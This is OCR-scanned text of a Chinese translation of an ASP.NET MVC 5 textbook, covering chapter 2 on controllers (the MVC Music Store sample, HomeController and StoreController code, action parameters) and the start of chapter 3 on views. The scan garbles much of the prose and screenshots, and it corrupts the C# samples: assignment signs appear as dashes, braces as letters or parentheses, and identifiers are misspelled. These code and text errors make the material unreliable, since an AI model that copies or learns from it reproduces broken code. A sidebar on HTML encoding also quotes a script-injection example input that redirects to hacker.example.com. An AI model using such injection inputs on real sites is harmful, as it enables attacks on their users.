比较 。 接 下 来 开始 深入 地 介绍 MVC 模 式 中 的 三 个 核心 元 素 之 一 一 一 控制 器 。 


2.1 控制 器 的 角色 


讨论 一 个 问题 最 好 的 方式 是 从 其 定义 开始 ， 然 后 再 深入 讨论 其 细节 。 在 阅读 本 章 时 ， 牢 
记 控制 器 的 定义 ， 这 将 为 理解 控制 器 含义 及 其 应 用 打下 坚实 基础 。 

MYVC 模 式 中 的 控制 器 (ControlleD 主要 负责 响应 用 户 的 输入 ， 并 且 在 响应 时 修改 模型 
(Model)。 通 过 这 种 方式 ，MVC 模 式 中 的 控制 器 主要 关注 的 是 应 用 程序 流 、 输 入 数据 的 处 理 ， 
以 及 对 相关 视图 (View) 输 出 数据 的 提供 。 

过 去 的 Web 服务 器 支持 访问 以 静态 文件 存储 在 磁盘 上 的 HTML 页 面 。 随 着 动态 网 页 的 盛 
行 ，Web 服 务 器 也 支持 由 存储 在 服务 器 上 的 动态 脚本 生成 的 HTML 页面 。MVC 则 略 有 不 同 。 
URL 首 先 告知 路 由 机 制 ( 下 面 几 章 会 有 介绍 ， 在 第 9 章 会 进行 详细 介绍 ) 去 实例 化 哪个 控制 器 ， 
调用 哪个 操作 方法 ， 并 为 该 方法 提供 需要 的 参数 。 然 后 控制 器 的 方法 决定 使 用 哪个 视图 ， 并 
对 该 视图 进行 渲染 。 

URL 并 不 与 存储 在 Web 服 务 器 磁盘 上 的 文件 有 直接 对 应 关系 ， 而 是 与 控制 器 类 的 方法 有 
关 。ASPNET MVC 对 MVC 模 式 中 的 前 端 控制 器 进行 了 改进 ， 正 如 后 面 第 9 章 介绍 的 ， 路 由 子 
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系统 在 前 面 ， 之 后 才 是 控制 器 。 
理解 MVC 模 式 在 Web 场 景 中 工作 原理 的 简便 方法 就 是 记 住 : MVC 提 供 的 是 方法 调用 结 
果 ， 而 不 是 动态 生成 的 (又 名 脚本 ) 页 面 。 


控制 器 简 史 
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MVC 已 经 出 现 了 很 长 一 段 时 间 一 一 可 以 追溯 到 现代 Web 应 用 程序 时 代 来 临 前 的 几 十 年 。 
当 MVC 第 一 次 开发 出 来 的 时 候 ， 图 形 用 户 界面 (GUD 才 刚刚 起 步 ， 且 在 不 断 演化 发 展 。 当 时 ， 
当 用 户 按 下 一 个 按键 或 单 击 屏幕 时 ， 某 个 进程 将 会 “监听 到 ”他 们 的 动作 ， 这 个 进程 就 是 控 
制 器 。 控 制 器 主要 负责 接收 和 解释 输入 ， 并 更 新 任何 需要 的 数据 类 (模型 )， 然 后 通知 用 户 进 
行 的 修改 或 程序 更 新 (视图 ， 第 3 章 会 详细 介绍 )。 

20 世 纪 70 年 代 末 和 80 年 代 初 , Xerox PARC( 刚 好 也 是 MVC 模 式 诞生 的 地 方 ) 的 研究 员 开 始 
研究 GUI 的 概念 ， 在 GUI 中 用 户 “ 工 作 ” 在 一 个 虚拟 的 “桌面 ”环境 中 ， 在 这 种 环境 下 ， 用 
户 可 以 单 击 和 来 回 拖 忠 条 目 。 从 这 里 产生 了 事件 驱动 编程 的 思想 一 -根据 用 户 触发 的 事件 (如 
单 击 鼠 标 或 是 敲 击 键盘 上 的 按键 ) 来 执行 程序 操作 。 

后 来 ， 随 着 GUI 成 为 规范 ，MVC 模 式 不 完全 适合 这 些 新 系统 ， 这 一 点 变 得 更 加 清晰 。 在 
此 类 系统 中 ， 由 GUI 组 件 负责 处 理 用 户 输入 ， 比 如 当 按 下 一 个 按钮 时 ， 是 该 按钮 本 身 响 应 鼠 
标 单 击 ， 而 不 是 控制 器 。 按 钮 转 而 将 依次 通知 所 有 单 击 的 观察 者 或 侦 听 者 它 被 单 击 了 。 相 对 
于 MVC 模 式 而 言 ， 另 一 些 模式 ， 如 模型 -视图 -表示 器 (Model-View-Presenter，MVP) 则 表现 的 
与 这 些 现代 系统 更 相关 。 

ASPNET Web Forms 是 一 个 基于 事件 的 系统 ， 这 在 Web 应 用 程序 平台 中 是 独一无二 的 。 
它 拥 有 一 个 强大 的 基于 控件 和 事件 驱动 的 编程 模型 ， 从 而 为 开发 人 员 进行 Web 开 发 提供 了 一 
个 良好 的 组 件 化 GUI。 当 单 击 一 个 按钮 时 ，Button 控 件 将 会 做 出 响应 ， 并 在 服务 器 端 引发 一 个 
事件 以 告知 它 被 单 击 。 这 种 方法 的 妙 处 在 于 它 可 以 让 开发 人 员 在 更 高 的 抽象 级 别 下 编写 代码 。 

然而 ， 进 行 更 深入 的 分 析 会 发 现 ， 开 展 的 很 多 工作 都 是 在 模拟 这 种 组 件 化 的 事件 驱动 。 
然而 本 质 上 , 当 单 击 一 个 按钮 时 , 浏览 器 将 向 包含 了 页 面 上 控件 状态 的 服务 器 提交 一 个 请 求 ， 
控件 所 在 的 页 面 会 被 封装 在 一 个 编码 的 隐藏 输入 中 。 在 服务 器 端 , 为 了 响应 该 请 求 , ASPNET 
必须 重建 整个 控件 层次 结构 ， 然 后 解释 请 求 ， 并 利用 请 求 的 内 容 来 恢复 应 用 程序 中 用 户 的 当 
前 状态 。 究 其 本 质 , 所 有 这 些 都 是 因为 Web 是 无 状态 的 。 因 此 , 当 使 用 富 客户 端的 Windows GUI 
应 用 程序 时 ， 没 必要 每 当 用 户 单 击 一 个 UI 小 部 件 时 就 重建 整个 屏幕 和 控件 层次 结构 ， 因 为 应 
用 程序 保持 了 原状 态 ， 不 曾 改 变 。 

对 于 Web 程 序 而 言 ， 用 户 的 应 用 程序 状态 实质 上 是 消失 的 ， 只 不 过 是 后 来 用 户 每 次 单 击 
后 都 会 恢复 。 虽 然 这 会 极 大 地 简化 程序 ， 但 是 以 HTML 形式 出 现 的 用 户 界面 需要 从 服务 器 发 
送 到 客户 端 浏览 器 。 这 就 引发 一 个 问题 :“ 应 用 程序 在 哪里 ? ”， 对 于 大 多 数 Web 页 面 而 言 ， 
应 用 程序 就 在 客户 端 和 服务 器 之 间 “ 和 舞蹈 ”每 次 都 维持 一 个 小 状态 ， 可 能 是 客户 端的 一 个 
cookie 或 是 服务 器 上 的 一 块 内 存 ， 一 切 都 被 小 心地 设计 来 掩盖 一 个 小 小 的 “谎言 ” 这 个 “ 谎 
言 ” 就 是 mnternet 和 HTTP 可 以 进行 有 状态 的 编程 。 

当 进行 Web 开 发 时 ， 事 件 驱 动 编程 方法 ( 即 “ 状 态 ” 概 念 ) 的 支撑 作用 将 不 复 存 在 ， 并 且 许 
多 人 不 愿 接 受 这 个 虚拟 有 状态 平台 的 谎言 。 鉴 于 此 ， 业 界 已 经 见证 了 MVC 模 式 的 复兴 (尽管 
对 其 做 了 一 点 轻微 的 改动 )。 

下 面 给 出 一 个 改动 的 示例 。 在 传统 的 MVC 模 式 中 , 模型 可 以 通过 与 视图 的 间接 联系 来 “ 观 
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察 ” 视 图 ， 这 就 允许 模型 根据 视图 的 事件 来 进行 自我 调整 。 对 于 在 Web 开 发 中 应 用 MVC 模 式 
而 言 ， 当 视图 被 发 送 到 客户 端 浏 览 器 时 ， 模 型 通常 已 经 不 在 内 存 当 中 ， 所 以 就 不 再 能 观察 
视图 上 的 事件 (注意 ， 当 第 8 章 中 讨论 将 Ajax 运用 到 MVC 中 时 ， 将 看 到 这 一 改动 的 例外 情况 )。 

在 Web 开 发 中 采用 MVC 模 式 ， 控 制 器 再 次 走 在 了 前 列 。 应 用 MVC 模 式 要 求 Web 应 用 程序 
中 的 每 一 个 用 户 输入 只 采用 请 求 的 方式 。 例 如 ， 在 ASPNET MVC 中 ， 每 个 请 求 都 被 路 由 (路 
由 使 用 将 在 第 9 章 中 介绍 ) 到 控制 器 的 一 个 方法 (又 称 操作 )， 该 控制 器 全 权 负责 解释 这 些 请 求 ， 
如 有 必要 ， 还 要 操纵 模型 ， 然 后 选择 一 个 视图 反馈 给 用 户 。 


上 面 学 习 了 一 部 分 理论 知识 , 接 下 来 深入 讲解 ASPNET MVC 控 制 器 的 具体 实现 。 我 们 将 
继续 使 用 第 1 章 创建 的 项 目 。 如 果 跳 过 了 第 1 章 中 新 项 目的 创建 ， 请 参照 上 一 章 中 的 步 又， 使 
Internet Application 模 板 和 Razor 视 图 引擎 创建 一 个 新 的 ASPNET MVC 5 应 用 程序 ， 最 终结 
果 如 图 1-9 所 示 。 


2.2 示例 应 用 程序 : MVC Music Store 


正如 第 1 章 中 提 到 的 ， 本 书 中 的 很 多 示例 程序 都 是 采用 的 MVC Music Store。 有 关 MVC 
Music Store 应 用 程序 的 更 多 信息 ， 请 查阅 http://mvemusicstore.codeplex.com。 这 个 MVC Music 
Store 教 程 专 为 初学 者 设计 ， 讲 解 进度 很 慢 ; 本 书 是 专业 系列 从 书 中 的 一 本 ， 进 度 会 比较 快 ， 
并 且 还 会 阐述 一 些 比较 高 级 的 背景 细节 。 因 此 ， 如 果 你 希望 简单 较 慢 地 学 习 这 些 内 容 ， 请 参 
考 MVC Music Store 教 程 。 这 个 教程 可 以 在 线 以 HTML 格式 查 阅 ， 也 可 以 下 载 150 页 的 PDF 文 
ft. MVC Music Store 以 Creative Commons 许 可 的 方式 发 布 ， 这 样 可 以 自由 重用 ， 本 书 有 时 将 
引用 该 程序 。 

MVC Music Store 应 用 程序 是 一 个 简单 的 音乐 商店 ， 其 中 包括 基本 的 购物 、 结 账 和 管理 功 
能 ， 如 图 2-1 所 示 。 


< > ET T NS 


| INTRODUCTORY OFFER 
SALEEEY 
GET 


10,000 Black Light waramw .And 
Days Syndrome Justice For 
All 
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该 音乐 商店 涵盖 以 下 特征 : 
e 浏览 : 根据 流派 和 艺术 家 浏览 音乐 ， 如 图 2-2 所 示 。 


= 


图 2-2 


e 添加 : 向 购物 车 中 添加 音乐 ， 如 图 2-3 所 示 。 


图 2-3 
e 购物 : 更 新 购物 车 (采用 Ajax 更 新 )， 如 图 2-4 所 示 。 


e- Er Er 


Review your cart: 
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e 订单 : 生成 一 个 订单 并 且 结 账 注 销 登录 ， 如 图 2-5 所 示 。 


€ o OE rr 


Address And Payment 


Shipping Information 


First Name 


d 


Last Name 


pM — 


Address 


Postal Code 


一 — 
Country 

一 

Phone 


一 — 


Email Address. 


d 


Payment 


Werre running a promotion: all music is free with Ihe promo code "FREE" 


Promo Code 


e 管理 : 编辑 歌曲 列表 ( 仅 限 管理 员 )， 如 图 2-6 所 示 。 


Name 
Men AL Work 

Metamca 

rov gn 

Teny Bozzio. Tony Levin 
Tool 

Supreme Bengs of Leisure 
Sou Junk 

deadmau5 

London Symphony Orchestra. 
Paui Oakentold 

on Malden 

Iron Malden 


Iron Maiden 


Coldplay 


Briten Sinfonia, ivor Bo. 


LIHiETUTTPUUERI- 


Twe 
The Best Of The Men At Wo. 

And Justice For Al 
waww 
Black Light Syndrome 
10,000 Days 
E 
1960 
m 
A Copland Celebration. Vo. 
A Uvely Mind at | Deta 
A Matter of Lite and Deat cta 
A Real Dead One eta 
AReal Live One — 
A Rush of Blood to tne He Eat | Detat 


A Soprano inspired Edit | Detai 


vamuscstore codepiex com 
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2.3 ”控制 器 基础 


在 MVC 入 门 时 会 遇 到 像 先 有 鸡 还 是 先 有 和 蛋 这 样 的 问题 ， 需 要 理解 三 个 部 分 (模型 、 视 图 
和 控制 器 )， 但 在 不 理解 其 他 部 分 的 情况 下 ， 要 深入 了 解 其 中 一 个 部 分 是 很 难 的 。 因此， 在 开 
始 学 习 MVC 时 ， 需 要 首先 概括 性 地 了 解 控制 器 ， 暂 时 先 不 管 模型 和 视图 。 
解 了 控制 器 的 基本 工作 原理 之 后 ， 我 们 将 准备 深入 地 讲解 视图 、 模 型 和 其 他 ASPNET 
MYVC 开 发 主题 。 然 后 在 第 15 章 再 回 过 头 来 讲解 高 级 控制 器 。 


-e 


2.3.1 简单 示例 : Home Controller 


在 开始 实质 性 地 编写 代码 之 前 ， 首 先 了 解 一 下 在 一 个 新 的 项 目 中 默认 都 包含 哪些 内 容 。 
使 用 MVC 模 板 一 一 Individual User Accounts 一 一 创建 的 项 目 默 认 包 含 两 个 控制 器 类 : 

e HomeController: 负责 网 站 根 目 录 下 的 “home page”、“about page” 和 “contact page”。 

* AccountController: 响应 与 账户 相关 的 请 求 ， 比 如 登录 和 账户 注册 。 

在 Visual Studio 的 项 目 中 , 展开 /Controllers 文 件 夹 ， 打开 HomeController.cs 文 件 ， 如 图 2-7 
所 示 。 


B. MvcMusicStore - Microsoft Visual Studio QU V auc Lunch (Cure Q) P- ox 
RUE EDT WEW PROICT DWD OUG TEAM TOOS TEST ARCHTECTURE WEBESSENTAS ANADZE WNDOW HEP jonosonny - B 
e-* ur P intenet Explorer - ^ C) ~ Debug - P. 


Esplorer Team Explorer 


注意 ， 这 是 一 个 相当 简单 的 类 ， 它 继承 了 Controller 基 类 。HomeController 类 的 Index 方 法 
负责 决定 当 浏 览 网 站 首页 时 触发 的 事件 。 下 面 按照 以 下 步骤 对 程序 进行 简单 的 修改 ， 然 后 运 
行程 序 。 

(1) 用 自己 想 要 的 短语 蔡 换 About 方 法 中 的 “Your application description page.”, 比如 “Ilike 


925m ide 制 器 


cake! ". 


using System; 

using System.Collections.Generic; 
using System.Linq; 

using System.Web; 

using System.Web.Mvc; 


namespace MvcMusicStore.Controllers 
{ 
public class HomeController : Controller 
í 
public ActionResult Index () 
{ 
return View(); 
) 
public ActionResult About() 
t 
ViewBag.Message - "I like cake!"; 
return View(); 
) 
public ActionResult Contact () 
t 
ViewBag.Message - "Your contact page."; 
return View(); 


) 


(2) 按 下 F5 键 或 者 使 用 Debug | Start Debugging 菜 单项 运行 应 用 程序 。Visual Studio 编 译 应 
用 程序 并 启动 运行 在 IS Express 下 的 站 点 。 


IIS Express 和 ASP.NET 开 发 服务 器 

Visual Studio 2013 包 括 IIS Express, 这 是 IS 的 本 地 开发 版 本 ,可 以 用 来 在 一 个 随机 的 空闲 
端口 上 运行 网 站 。 在 图 2-8 中 ， 网 站 在 http://localhost:26641/ 上 运行 ， 因 此 它 采用 的 端口 号 是 
26641， 你 运行 时 的 端口 号 可 能 与 这 个 不 同 。 本 书 讨论 的 URL( 比 如 /Store/Browse) 会 跟 在 端口 
号 后 面 。 假 设 端口 号 是 26641， 那 么 浏览 /Store/Browse 将 意味 着 是 浏览 http://localhost:26641/ 
Store/Browse. 

Visual Studio 2010 及 其 以 下 版 本 使 用 的 是 Visual Studio Development Server( 有 时 也 称 它 的 
老 代号 Cassini)， 而 不 是 IIS Express。 尽 管 Development Server(R/&IIS, (HIIS Express 实 际 上 是 IS 
的 优化 版 本 ， 优 化 后 使 它 更 适用 于 开发 。 想 更 多 地 了 解 IS Express， 请 查阅 Scott Guthrie 的 博 
客 http://weblogs.asp.net/scottgu/7673719.aspx。 


(3) 接 下 来 ， 会 打开 一 个 浏览 器 窗口 ， 显 示 网 站 的 首页 ， 如 图 2-8 所 示 。 

(4) 浏览 到 /Home/About, 打开 About 页 面 (也 可 以 单 击 页 面 顶部 的 About 链 接 打开 该 页 面 )。 
更 新 后 的 消息 将 显示 出 来 ， 如 图 2-9 所 示 。 

现在 已 经 创建 了 一 个 新 项 目 并 在 屏幕 上 显示 了 一 些 短语 ， 接 下 来 通过 创建 一 个 新 的 控制 
器 来 创建 一 个 实际 的 应 用 程序 。 
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ASP.NET 


ASP.NET is a free web framework for building great Web sites and Web applications 
using HTML, CSS and JavaScript. 


Leam more 


Getting started Get more libraries Web Hosting 

ASP.NET MVC ges you a power, palems- NuGet is a ree Visual Studio extensiontnat You can easty fnd a web hosting company that 
based way to buld dynamic wcbstes mat makes k easy to add. remove. and updale offers the right mix of Teatures and pce for your 
enabies a clean separation of concems and «Nrares ard toots n Visual Studio projects. appicatons 

ges you Mi control over markup for enjoyatie, 


agfle development. Leam more » Leam more» 


cz Err 


About. 


l like cake! 


Use this area to provide additional information. 


© 2013 - My ASP.NET Application 


2.3.2 创建 第 一 个 控制 器 


首先 创建 一 个 控制 器 来 处 理 有 关 浏览 音乐 目录 的 URL。 这 个 控制 器 支持 以 下 三 个 功能 : 
e 索引 页 面 列 出 商店 里 包含 的 音乐 类 型 。 

e 单 击 一 个 流派 ， 跳 转 到 一 个 列 出 该 流派 下 所 有 音乐 专辑 的 页 面 。 

e 单 击 一 个 专辑 ， 跳 转 到 一 个 列 出 有 关 该 专辑 所 有 信息 的 页 面 。 


1. 创建 新 控制 器 


为 创建 控制 器 ， 首 先 添加 一 个 新 的 StoreController 类 。 具 体 方法 是 : 

(1) 右 击 Solution Explorer 下 的 Controllers 文 件 夹 ， 选 择 Add | Controller 菜 单项 ， 如 图 2-10 
所 示 。 

(2) 选择 MVC 5 ControllerEmpty 基 架 模板 ， 如 图 2-11 所 示 。 

G) 将 控制 器 命名 为 StoreController， 然 后 单 击 Add 按 钮 ， 如 图 2-12 所 示 。 
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Copy 


Delete 
X Rename 

Copy Path 
国 Open Command Prompt 
© Open Folderin File Explorer 
A Properties 


a -raga shia 
Search Solution Explorer (Ctri+;) 万 


Re Solution MveMusicStore’ (1 project) 
MveMusicStore 


Alt«Enter. 


图 2-10 


Solution Explorer Team Explorer 


yea 
F 


Pg, MNCS Controler with rend/onite actione 


E) MVS Contraer wih view wing Entiy Framework 


如 Web AN1 2 Controler -Empoy 


An empty MVC controller. 
lét MvcControlerEmptyScattolder 


Mg, Web API 2 Controller with actions. using Entity Framework 


Mig, Web AP12 Controler wirst actions 


Mg Web API 2 OData Controller with actions. using Entity Framework 


Mig Web API 2 OData Controller with read/write actions 


图 2-11 


图 2-12 


2. 编写 操作 方法 


新 创建 的 StoreController 控 制 器 已 经 有 了 一 个 Index 方 法 ， 下 面 将 利用 这 个 Index 方 法 实现 
在 页 面 上 列 出 音乐 商店 里 所 有 歌曲 流派 的 功能 。 另 外 ， 还 需要 添加 两 个 额外 的 方法 来 实现 上 
述 其 他 两 项 功能 ， 这 两 个 方法 分 别 是 Browse 和 Details。 
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控制 器 中 的 这 些 方法 (ndex、Browse 和 Details) 称 为 控制 器 操作 。 正 如 上 述 的 Home- 
Controller.Index() 操 作 方 法 那样 ， 控 制 器 操作 的 工作 是 响应 URL 请 求 ， 执 行 正确 的 操作 ， 并 向 
浏览 器 或 是 单 击 这 个 URL 的 用 户 做 出 响应 。 

要 了 解 控制 器 操作 的 工作 原理 ， 可 按照 以 下 步骤 操作 : 

(1) 将 Index0 方 法 的 签名 改 为 string( 而 不 是 ActionResult)， 然 后 将 返回 值 改 为 “Hello from 
Store.Index()”， 如 下 所 示 : 

fi 

// GET: /Store/ 


public string Index() 
t 


return "Hello from Store.Index()"; 
) 


Q) 添加 对 商店 的 Browse 操 作 方法 ， 将 返回 值 设 为 “Hello from Store.Browse()"; 添加 
Details 操 作 方法 ， 将 返回 值 设 为 “Hello from Store.Details0”。 控 制 器 StoreController 的 完整 代 
码 如 下 所 示 : 


using System; 

using System.Collections.Generic; 
using System.Ling; 

using System.Web; 

using System.Web.Mvc; 


namespace MvcMusicStore.Controllers 
t 
public class StoreController : Controller 
t 
// 
// GET: /Store/ 
public string Index() 
t 
return "Hello from Store.Index()"; 
) 
Zr 
// GET: /Store/Browse 
public string Browse() 
t 
return "Hello from Store.Browse()"; 
} 
tt 
// GET: /Store/Details 
public string Details () 
{ 
return "Hello from Store.Details()"; 
H 


} 
(3) 重新 运行 项 目 ， 然 后 浏览 以 下 URL: 
e /Store 


e /Store/Browse 
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® /Store/Details 
访问 这 些 URI 会 调用 控制 器 中 的 操作 方法 ， 然 后 返回 响应 字符 串 ， 如 图 2-13 所 示 。 


3. 


ray) 


E anassen pexa (0 


Hello from Store.Details() 


图 2-13 


从 以 上 这 个 简单 实验 中 可 以 得 出 以 下 几 个 结论 : 


2.3.3 


不 需要 做 任何 额外 配置 ,浏览 到 /Store/Details 就 可 以 执行 StoreController 类 中 的 Details 
方法 ， 这 就 是 操作 中 的 路 由 。 本 章 后 面 还 会 对 路 由 稍 做 介绍 ， 第 9 章 将 对 此 进行 详细 
介绍 。 

尽管 是 使 用 Visual Studio 工具 来 创建 这 个 控制 器 类 ， 但 它 的 确 是 一 个 非常 简单 的 类 。 
判别 一 个 类 是 否 是 控制 器 类 的 唯一 方式 ， 就 是 查看 该 类 是 否 继承 自 System Web. 
Mvc.Controller. 

已 经 利用 一 个 控制 器 在 浏览 器 中 显示 了 文本 一 没有 用 到 模型 和 视图 。 尽 管 在 
ASPNET MVC 中 模型 和 视图 非常 有 用 ， 但 控制 器 才 是 真正 的 核心 。 每 一 个 请 求 都 必 
须 通过 控制 器 处 理 ， 然 而 其 中 有 些 请 求 是 不 需要 模型 和 视图 的 。 


控制 器 操作 中 的 参数 


前 面 的 例子 写 出 的 是 常量 字符 串 。 下 一 步 就 是 让 它们 通过 响应 URL 传 进来 的 参数 动态 地 
执行 操作 。 按 以 下 步骤 来 实现 : 

(1) 把 Browse 操 作 方 法 修改 为 ， 检 索 从 URL 传 过 来 的 查询 字符 串 值 。 可 以 通过 在 操作 方 
法 中 添加 一 个 string 类 型 的 “genre” 参 数 来 实现 这 个 功能 。 然 后 , 当 这 个 方法 被 调用 时 , ASPNET 
MVC 会 自动 将 名 为 “genre” 的 查询 字符 串 或 表单 提交 参数 传递 给 Browse 操 作 方法 。 


a 


// GET: /Store/Browse?genre-?Disco 
public string Browse(string genre) 


t 


} 


string message = 
HttpUtility.HtmlEncode("Store.Browse, Genre = " + genre); 
return message; 
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HTML 编 码 的 用 户 输入 

利用 方法 HttpUtilityHtmlEncode 来 预 处 理 用 户 输入 。 这 样 就 能 阻止 用 户 用 链接 向 视图 中 
注入 JavaScript 代 码 或 HIML 标 记 ， 比 如 /Store/Browse?Genre=<script>windowlocation= 
'http://hacker.example.com'</script> 。 


(2) 浏览 到 /Store/Browse?Genre=Disco， 结 果 如 图 2-14 所 示 。 


Erm) 


[B nci locales /store /rove Geme- Docs D - © X || E locaton x aad 


Store.Browse, Genre = Disco 


图 2-14 


这 表明 控制 器 操作 可 将 查询 字符 串 作 为 其 操作 方法 的 参数 来 接收 。 

(3) 修改 Details 操 作 方 法 ， 使 其 读 取 和 显示 一 个 名 为 ID 的 输入 参数 。 这 里 不 像 前 面 的 
方法 那样 把 耳 值 作为 一 个 查询 字符 串 参 数 ， 而 是 将 耳 值 直接 嵌入 到 URL 中 du 
/Store/Details/5 。 

ASPNET MVC 在 不 需要 任何 额外 配置 的 情况 下 可 以 很 容易 地 做 到 这 一 点 。ASPNET 
MVC 的 默认 路 由 约定 ， 就 是 将 操作 方法 名 称 后 面 URL 的 这 个 片段 作为 一 个 参数 ， 该 参数 的 名 
称 为 ID。 如 果 操 作 方法 中 有 名 为 ID 的 参数 ， 那 么 ASPNET MVC 会 自动 将 这 个 URL 片 段 作 为 
参数 传递 过 来 。 

// 

// GET: /Store/Details/5 


public string Details(int id) 


{ 
string message = "Store.Details, ID = " + id; 


return message; 
} 


(4) 运行 应 用 程序 ， 浏 览 到 /Store/Details/5， 结 果 如 图 2-15 所 示 。 


Store.Details, ID= 5 


图 2-15 
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像 前 面 示例 演示 的 那样 , 控制 器 操作 感觉 就 像 是 Web 浏 览 器 直接 调用 控制 器 类 中 的 方法 。 
类 、 方 法 和 参数 都 被 具体 化 为 URL 中 的 特定 路 径 片 段 或 查询 字符 串 ， 结 果 就 是 一 个 返回 给 浏 
览 器 的 字符 串 。 这 就 进行 了 极 大 的 简化 ， 而 忽略 了 下 面 这 些 细节 : 

e 路 由 将 URL 映射 到 操作 的 方式 。 

e. 将 视图 作为 模板 生成 返回 给 浏览 器 的 字符 串 ( 通 常 是 HTML 格式 )。 

o 操作 很 少 返 回 原始 的 字符 串 ; 它 通常 返回 合适 的 ActionResult 来 处 理 像 HTTP 状态 码 

和 调用 视图 模板 系统 这 样 的 事项 。 

控制 器 提供 了 很 多 自 定义 和 扩展 的 功能 , 但 是 我 们 很 少 能 用 到 这 些 内 容 。 在 一 般 应 用 中 ， 
控制 器 通过 URL 被 调用 ， 然 后 执行 自 定义 的 代码 并 返回 一 个 视图 。 先 记 住 这 些 内 容 ， 后 面 我 
们 会 详 述 关 于 控制 器 如 何 定义 、 调 用 和 扩展 的 底层 细节 ， 这 些 底层 内 容 以 及 其 他 高 级 主题 将 
在 第 15 章 中 进行 讲解 。 现 在 已 经 学 习 了 足够 的 控制 器 知识 ， 可 以 与 视图 结合 起 来 使 用 了 ， 第 3 
章 中 会 对 这 部 分 内 容 进 行 详细 介绍 。 


2.4 小 结 


控制 器 是 MVC 应 用 程序 的 “指挥 员 ”， 它 精心 紧密 地 编排 用 户 、 模 型 对 象 和 视图 的 交互 。 
同时 控制 器 还 负责 响应 用 户 输入 ， 操 纵 正 确 的 模型 对 象 ， 然 后 选择 合适 的 视图 显示 给 用 户 以 
作为 对 用 户 最 初 输入 的 响应 。 

本 章 讲解 了 控制 器 独立 于 视图 和 模型 工作 的 基本 原理 ， 讲 解 了 应 用 程序 如 何 执行 代码 来 
响应 URL 请 求 , 这 些 都 是 处 理 用 户 界 面 的 必 备 知识 。 接 下 来 的 第 3 章 将 介绍 视图 的 相关 内 容 。 
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本 章 主要 内 容 
视图 的 作用 

视图 的 基础 知识 
视图 的 基本 约定 
强 类 型 视图 
理解 视图 模型 
如 何 添加 视图 
Razor 的 用 法 
指定 部 分 视图 


本 章 代码 下 载 : 


如 前 言 所 述 ,本 章 所 有 代码 通过 NuGet 包 提供 。 NuGet 代 码 示例 将 在 适用 小 节 的 末尾 的 说 


明 中 清晰 标明 。 也 可 以 访问 以 下 网 
proaspnetmvcs 。 


开发 人 员 之 所 以 花费 大 量 时 间 来 了 


址 ， 获 得 脱 机 使 用 的 代码 : http://www.wrox.com/go/ 


点 设计 控制 器 和 模型 对 象 ， 是 因为 在 这 些 领域 中 ， 精 


心 编写 的 整洁 代码 是 开发 一 个 可 维护 Web 应 用 程序 的 基础 。 
但 是 当 用 户 在 浏览 器 中 访问 Web 应 用 程序 时 ， 这 些 工作 他 们 是 看 不 到 的 。 用 户 对 应 用 程 
序 的 第 一 印象 ， 以 及 与 应 用 程序 的 整个 交互 过 程 都 是 从 视图 开始 的 。 


视图 实际 上 就 是 应 用 程序 的 “大 使 ”。 
显而易见 ， 如 果 应 用 程序 的 其 他 部 分 存在 错误 ， 那 么 设计 再 好 ， 再 没有 瑕 症 的 视图 也 不 


能 弥补 这 方面 的 不 足 。 同 样 ， 如 果 创建 一 个 丑陋 且 难 以 利用 的 视图 ， 那 么 许多 用 户 将 不 会 给 


应 用 程序 提供 证 明 它 的 功能 多 么 强大 


、 运 行 多 么 顺畅 的 机 会 。 


本 章 不 会 向 读者 展示 如 何 设计 精彩 的 视图 。 尽 管 整 洁 干净 的 标记 可 以 使 设计 工作 轻松 ， 
但 是 可 视 化 设计 是 从 呈现 内 容 分 离 的 关注 点 。 因此 , 本 章 将 阐述 视图 在 ASPNET MVC 中 的 工 


作 原 理 及 其 职责 ， 并 提供 了 工具 来 创 


建 应 用 程序 引 以 为 豪 的 视图 。 
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3.1 视图 的 作用 


第 2 章 分 析 了 控制 器 如 何 返 回答 出 到 浏览 器 的 字符 串 。 这 对 于 控制 器 的 入 门 非常 有 帮助 ， 
但 在 一 些 重大 的 Web 应 用 程序 中 ， 我 们 会 很 快 注意 到 一 个 模式 : 大 部 分 的 控制 器 操作 需要 以 
HTIMIL 格 式 动 态 显示 信息 。 如 果 控 制 器 操作 仅仅 返回 字符 串 ， 那 么 就 需要 有 大 量 的 字符 串 蔡 
换 操 作 ， 这 样 就 会 变 得 混乱 不 堪 。 因 此 ， 模 板 系统 的 需求 越 来 越 清晰 ， 此 时 ， 视 图 应 运 而 生 。 

视图 的 职责 是 向 用 户 提 供用 户 界面 。 当 控制 器 针对 被 请 求 的 URIL 执 行 完 合适 的 逻辑 后 ， 
就 将 要 显示 的 内 容 委托 给 视图 。 

不 像 基 于 文件 的 Web 框 架 ， 比 如 ASPNET Web Forms 和 PHP， 视 图 本 身 不 会 被 直接 访问 ， 
浏览 器 不 能 直接 指向 一 个 视图 并 演 染 它 。 相 反 ， 视 图 总 是 被 控制 器 泻 染 ， 因 为 控制 器 为 它 提 
供 了 要 泻 染 的 数据 。 

在 一 些 简单 的 情况 中 ， 视 图 不 需要 或 需要 很 少 控制 器 提供 的 信息 。 更 常见 的 情况 则 是 控 
制 器 需要 向 视图 提供 一 些 信息 ， 所 以 它 会 传递 一 个 数据 转移 对 象 ， 叫 做 模型 。 视 图 将 这 个 模 
型 转换 为 一 种 适合 显示 给 用 户 的 格式 。 在 ASPNET MVC 中 ， 完 成 这 一 过 程 由 两 部 分 操作 ， 划 
中 一 个 是 检查 由 控制 器 提交 的 模型 对 象 ， 另 一 个 是 将 其 内 容 转 换 为 HTML 格 式 。 


注意 ”并非 所 有 视图 都 泻 当 HTML 格式。 当然 ， 在 创建 Web 应 用 程序 的 过 程 
中 ，HTML 是 最 常用 的 格式 。 但 是 ， 正 如 第 16 章 中 操作 结果 部 分 介绍 的 那样 ， 视 
| 图 也 可 以 泻 染 其 他 类 型 的 内 容 。 


3.2 视图 的 基础 知识 


考虑 到 新 接触 ASPNET MVC 的 读者 , 这 里 将 放 慢 讲解 速度 。 理解 视图 原理 最 简单 的 方法 
是 查看 在 一 个 新 ASPNET MVC 应 用 程序 中 创建 的 样本 视图 。 首先 看 一 个 最 简单 的 例子 : 不 需 
要 控制 器 提供 任何 信息 的 视图 。 打 开 第 2 章 创 建 的 项 目 ( 或 任何 新 建 的 MVC 5 项 目 ) 下 的 
/Views/Home/Index.cshtml 文 件 ， 如 程序 清单 3-1 所 示 。 


程序 清单 3-1 Home Index 视 图 一 一 Index.cshtml 
[Ti 
ViewBag.Title - "Home Page"; 


} 


<div class="jumbotron"> 
<h1>ASP.NET</h1> 
<p class="lead">ASP.NET is a free web framework for building 
great Web sites and Web applications using HTML, 
CSS and JavaScript.</p> 
<p><a href="http://asp.net" class="btn btn-primary btn-large"> 
